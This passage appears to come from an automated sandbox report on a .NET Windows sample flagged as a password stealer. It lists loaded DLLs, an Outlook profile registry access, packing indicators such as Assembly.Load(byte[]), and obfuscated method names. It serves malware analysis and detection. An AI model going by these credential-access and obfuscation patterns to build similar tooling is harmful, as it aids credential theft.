                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, MainForm.cs.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"Client"}}, (string[])null, (bool[])null)
                    .NET source code contains potential unpacker
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.cs.Net Code: xocnug2MP1 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.cs.Net Code: xocnug2MP1 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.5900000.5.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeStatic PE information: section name: .text entropy: 7.936637319472689
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, vXYwLM6affvGl1LPOo.csHigh entropy of concatenated method names: 'yih92uOZyQ', 'S3G9YLiO66', 'Q7F9ObyBsE', 'Kk09I17Irp', 'wdC9finRyv', 'jkN9XO07CO', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, WkF8QKmv6uqjX95PHf.csHigh entropy of concatenated method names: 't8HCgbuYSc', 'mewCcPg60A', 'ToString', 'Q4NCWgQRxu', 'GH4CajFshm', 'kDkCBrf8iI', 'dlGCF00Sff', 'y9mCRrB0cG', 'RnEC0iuSl1', 'OsJC83oOSt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, TcVC0Xedd5l3T2VdXk.csHigh entropy of concatenated method names: 'C0KCq6mVNk', 'MqECjMgJtn', 'D1J9bGbij7', 'oCr94FMJMU', 'EyKCStWlqV', 'b2PCsO2CR7', 'QDfCkqt9oT', 'Y4yCfInT47', 'FRhCDlJ0WC', 'FSdCVXapeg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, bZcao94bdgy2x14WBPd.csHigh entropy of concatenated method names: 'X8157vKUkL', 'rAS5HyICcO', 'jg85ugNSlU', 'ecR5Kos4x4', 'eKd53ZPLsq', 'poT5QaRUJR', 'fMf5huUcc0', 'YEC5TdHQvi', 'Iyj5pLBUnD', 'lWA5MD2SHu'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, OW4YfnoSj5wlFPuOx9.csHigh entropy of concatenated method names: 'ckiuvw9CA', 'uWcK8kCIV', 'M6HQsse9D', 'VtWhoZINl', 'njCptoWCp', 'PCqMcD6ZM', 'z70ibP5P3jyyjrdSGQ', 'qOMp2aoIpu8X48OW3P', 'USk9NhbRq', 'Vc0vo8Tk6'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, SRgaAAwhAm8UliGP0b.csHigh entropy of concatenated method names: 'sqC07wcMMx', 'EMu0HQQ7LY', 'IYc0uOecGh', 'DRF0KZbPFI', 'lnW03CaJhq', 'GX60QVtWlB', 'Wa40hDCeI4', 'zbu0TxYuL8', 'cCO0pYMy7y', 'l680MtQlvn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, Hc9U8kz21TDVdAQLYU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sX55Gxg0nm', 'zIl5xP4L9E', 'j1o5y6uV6X', 'R5S5CK401h', 'zSi59Yeor6', 'oRq55DRO7f', 'REF5vvajxY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, lTWl2xpfefJy2fW2xt.csHigh entropy of concatenated method names: 'ECBBKhmuRV', 'h3jBQFaSKS', 'OJcBTR8XhO', 'XqtBpepUlW', 'dHoBxg5Shp', 'TqnByajJSt', 'T6nBCQnDW3', 'x69B9FbNgB', 'NevB53u1Kh', 'a7jBvRfg7J'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ePE3KA8VIr13I1M4c5.csHigh entropy of concatenated method names: 'evEUNWT4mX', 'o65UWYGcr1', 'vihUaL7DHR', 'BDjUBbOC7m', 'RhYUFhPPyX', 'pgRURSj5PR', 'Ed1U0DFPXW', 'tR1U8CvAE3', 'aKKUPZOhbE', 'rr7UgLxbVK'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, mWClDI2yB8UHgKXbtY.csHigh entropy of concatenated method names: 'yVBRNohyD4', 'kj4RacwYgb', 'b3ARFE1ZxB', 'LYXR0BYuXu', 'L4nR86PlFl', 'zQrFLvCA1Z', 'B87Fe9ts6L', 'D6yFiB2csA', 'DERFqbpqKm', 'up4F6jGMon'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, MB7b0NfyoxYV0SQiFl.csHigh entropy of concatenated method names: 'vgGxtOmQqW', 'DSOxs3Emlx', 'QyGxfBFIJA', 'mKMxD0NfS1', 'zR1xYk8QDK', 'BHdxOoviK6', 'TpfxImDk25', 'WamxXewxBA', 'mInxJBeWp2', 'qAUx1eAEJf'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, NkHH8aaHieshbOGjZ0.csHigh entropy of concatenated method names: 'Dispose', 'B6G46TNFqZ', 'bwwoYRubkX', 'Buipp4ULiD', 'hW94jVVgOt', 'UDd4zbvcOu', 'ProcessDialogKey', 'FplobXYwLM', 'gffo4vGl1L', 'lOoooCuUZb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, quUZbOjZItL0Y37eit.csHigh entropy of concatenated method names: 'XwN54c4e6D', 'buL5UJG8aW', 'mo65n6hC91', 'z0y5WbMDZG', 'pBm5a0M5oC', 'Tby5Fi3VyZ', 'TAg5RTL5IE', 'LbA9iREX9V', 'zyl9qwMjYH', 'XIx96eCwvt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, XYYqf4n73hAkgG0EWi.csHigh entropy of concatenated method names: 'hd440ZvWos', 'RY548WcGlw', 'ofe4gfJy2f', 'f2x4ctOCxN', 'vlL4xbfgWC', 'vDI4yyB8UH', 'm83J9YwjZiyV7qyNfO', 'XTFUGO2Cra9GustkTx', 'VOK440mLli', 'OoZ4U6CxwO'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, ICxNAXMVLRDUxllLbf.csHigh entropy of concatenated method names: 'FuRF3PhaAw', 'CjqFh17KjM', 'tO3BOXul7h', 'X7CBIsA1v8', 'UgsBXm41x4', 'u8YBJHknoF', 'B1IB1yPutJ', 'NjyBZaNEkP', 'AWVBwd3mX8', 'G9TBt72lTL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, aZvWosTDY5WcGlwOCb.csHigh entropy of concatenated method names: 'YcZafvJC9c', 'JZQaDeT0ga', 'BobaVvDQ7T', 'YEfamsrSRX', 'lsFaLqway4', 'IDeaewX0ix', 'sR3aiRQmgP', 'jg5aqHwMdI', 'T08a6Mgiot', 'wqwajxgwrE'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, n0d30tkUjmZhkVdp3W.csHigh entropy of concatenated method names: 'JtBGTrVcUT', 'm4IGpwDKto', 'VPfG2DWTRn', 'R3pGYnuy5G', 'Gn9GIhU9LC', 'HQoGXQ4xFr', 'dkyG1Q93Mx', 'myJGZODWtI', 'RqdGtAE4i9', 'flaGSZFDQq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, sDodVE1Sj2ONgcKV3f.csHigh entropy of concatenated method names: 'x2r0W1BIeF', 'r5h0Bs23Xj', 'sGH0Rn6A00', 'b6eRjCMo8E', 'zAARzehCLN', 'w100bYZNDN', 'LuV04R5Pkv', 'Ape0oSAT3b', 'v810UEBRJt', 'OiF0nf70ne'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.7ed0000.9.raw.unpack, f9VVgOqtLDdbvcOuMp.csHigh entropy of concatenated method names: 'QRa9Wi60Ok', 'YU49aBLkyd', 'YfT9BcxY8w', 'gek9FBQn8m', 'CeU9Rbwc0j', 'cDD90YFvb7', 'WXh98ZJcHv', 'V6N9PWoUZx', 'TAB9gxlKgC', 'hdA9clSoVb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, vXYwLM6affvGl1LPOo.csHigh entropy of concatenated method names: 'yih92uOZyQ', 'S3G9YLiO66', 'Q7F9ObyBsE', 'Kk09I17Irp', 'wdC9finRyv', 'jkN9XO07CO', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, WkF8QKmv6uqjX95PHf.csHigh entropy of concatenated method names: 't8HCgbuYSc', 'mewCcPg60A', 'ToString', 'Q4NCWgQRxu', 'GH4CajFshm', 'kDkCBrf8iI', 'dlGCF00Sff', 'y9mCRrB0cG', 'RnEC0iuSl1', 'OsJC83oOSt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, TcVC0Xedd5l3T2VdXk.csHigh entropy of concatenated method names: 'C0KCq6mVNk', 'MqECjMgJtn', 'D1J9bGbij7', 'oCr94FMJMU', 'EyKCStWlqV', 'b2PCsO2CR7', 'QDfCkqt9oT', 'Y4yCfInT47', 'FRhCDlJ0WC', 'FSdCVXapeg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, bZcao94bdgy2x14WBPd.csHigh entropy of concatenated method names: 'X8157vKUkL', 'rAS5HyICcO', 'jg85ugNSlU', 'ecR5Kos4x4', 'eKd53ZPLsq', 'poT5QaRUJR', 'fMf5huUcc0', 'YEC5TdHQvi', 'Iyj5pLBUnD', 'lWA5MD2SHu'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, OW4YfnoSj5wlFPuOx9.csHigh entropy of concatenated method names: 'ckiuvw9CA', 'uWcK8kCIV', 'M6HQsse9D', 'VtWhoZINl', 'njCptoWCp', 'PCqMcD6ZM', 'z70ibP5P3jyyjrdSGQ', 'qOMp2aoIpu8X48OW3P', 'USk9NhbRq', 'Vc0vo8Tk6'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, SRgaAAwhAm8UliGP0b.csHigh entropy of concatenated method names: 'sqC07wcMMx', 'EMu0HQQ7LY', 'IYc0uOecGh', 'DRF0KZbPFI', 'lnW03CaJhq', 'GX60QVtWlB', 'Wa40hDCeI4', 'zbu0TxYuL8', 'cCO0pYMy7y', 'l680MtQlvn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, Hc9U8kz21TDVdAQLYU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sX55Gxg0nm', 'zIl5xP4L9E', 'j1o5y6uV6X', 'R5S5CK401h', 'zSi59Yeor6', 'oRq55DRO7f', 'REF5vvajxY'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, lTWl2xpfefJy2fW2xt.csHigh entropy of concatenated method names: 'ECBBKhmuRV', 'h3jBQFaSKS', 'OJcBTR8XhO', 'XqtBpepUlW', 'dHoBxg5Shp', 'TqnByajJSt', 'T6nBCQnDW3', 'x69B9FbNgB', 'NevB53u1Kh', 'a7jBvRfg7J'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ePE3KA8VIr13I1M4c5.csHigh entropy of concatenated method names: 'evEUNWT4mX', 'o65UWYGcr1', 'vihUaL7DHR', 'BDjUBbOC7m', 'RhYUFhPPyX', 'pgRURSj5PR', 'Ed1U0DFPXW', 'tR1U8CvAE3', 'aKKUPZOhbE', 'rr7UgLxbVK'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, mWClDI2yB8UHgKXbtY.csHigh entropy of concatenated method names: 'yVBRNohyD4', 'kj4RacwYgb', 'b3ARFE1ZxB', 'LYXR0BYuXu', 'L4nR86PlFl', 'zQrFLvCA1Z', 'B87Fe9ts6L', 'D6yFiB2csA', 'DERFqbpqKm', 'up4F6jGMon'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, MB7b0NfyoxYV0SQiFl.csHigh entropy of concatenated method names: 'vgGxtOmQqW', 'DSOxs3Emlx', 'QyGxfBFIJA', 'mKMxD0NfS1', 'zR1xYk8QDK', 'BHdxOoviK6', 'TpfxImDk25', 'WamxXewxBA', 'mInxJBeWp2', 'qAUx1eAEJf'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, NkHH8aaHieshbOGjZ0.csHigh entropy of concatenated method names: 'Dispose', 'B6G46TNFqZ', 'bwwoYRubkX', 'Buipp4ULiD', 'hW94jVVgOt', 'UDd4zbvcOu', 'ProcessDialogKey', 'FplobXYwLM', 'gffo4vGl1L', 'lOoooCuUZb'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, quUZbOjZItL0Y37eit.csHigh entropy of concatenated method names: 'XwN54c4e6D', 'buL5UJG8aW', 'mo65n6hC91', 'z0y5WbMDZG', 'pBm5a0M5oC', 'Tby5Fi3VyZ', 'TAg5RTL5IE', 'LbA9iREX9V', 'zyl9qwMjYH', 'XIx96eCwvt'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, XYYqf4n73hAkgG0EWi.csHigh entropy of concatenated method names: 'hd440ZvWos', 'RY548WcGlw', 'ofe4gfJy2f', 'f2x4ctOCxN', 'vlL4xbfgWC', 'vDI4yyB8UH', 'm83J9YwjZiyV7qyNfO', 'XTFUGO2Cra9GustkTx', 'VOK440mLli', 'OoZ4U6CxwO'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, ICxNAXMVLRDUxllLbf.csHigh entropy of concatenated method names: 'FuRF3PhaAw', 'CjqFh17KjM', 'tO3BOXul7h', 'X7CBIsA1v8', 'UgsBXm41x4', 'u8YBJHknoF', 'B1IB1yPutJ', 'NjyBZaNEkP', 'AWVBwd3mX8', 'G9TBt72lTL'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, aZvWosTDY5WcGlwOCb.csHigh entropy of concatenated method names: 'YcZafvJC9c', 'JZQaDeT0ga', 'BobaVvDQ7T', 'YEfamsrSRX', 'lsFaLqway4', 'IDeaewX0ix', 'sR3aiRQmgP', 'jg5aqHwMdI', 'T08a6Mgiot', 'wqwajxgwrE'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, n0d30tkUjmZhkVdp3W.csHigh entropy of concatenated method names: 'JtBGTrVcUT', 'm4IGpwDKto', 'VPfG2DWTRn', 'R3pGYnuy5G', 'Gn9GIhU9LC', 'HQoGXQ4xFr', 'dkyG1Q93Mx', 'myJGZODWtI', 'RqdGtAE4i9', 'flaGSZFDQq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, sDodVE1Sj2ONgcKV3f.csHigh entropy of concatenated method names: 'x2r0W1BIeF', 'r5h0Bs23Xj', 'sGH0Rn6A00', 'b6eRjCMo8E', 'zAARzehCLN', 'w100bYZNDN', 'LuV04R5Pkv', 'Ape0oSAT3b', 'v810UEBRJt', 'OiF0nf70ne'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4441350.4.raw.unpack, f9VVgOqtLDdbvcOuMp.csHigh entropy of concatenated method names: 'QRa9Wi60Ok', 'YU49aBLkyd', 'YfT9BcxY8w', 'gek9FBQn8m', 'CeU9Rbwc0j', 'cDD90YFvb7', 'WXh98ZJcHv', 'V6N9PWoUZx', 'TAB9gxlKgC', 'hdA9clSoVb'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
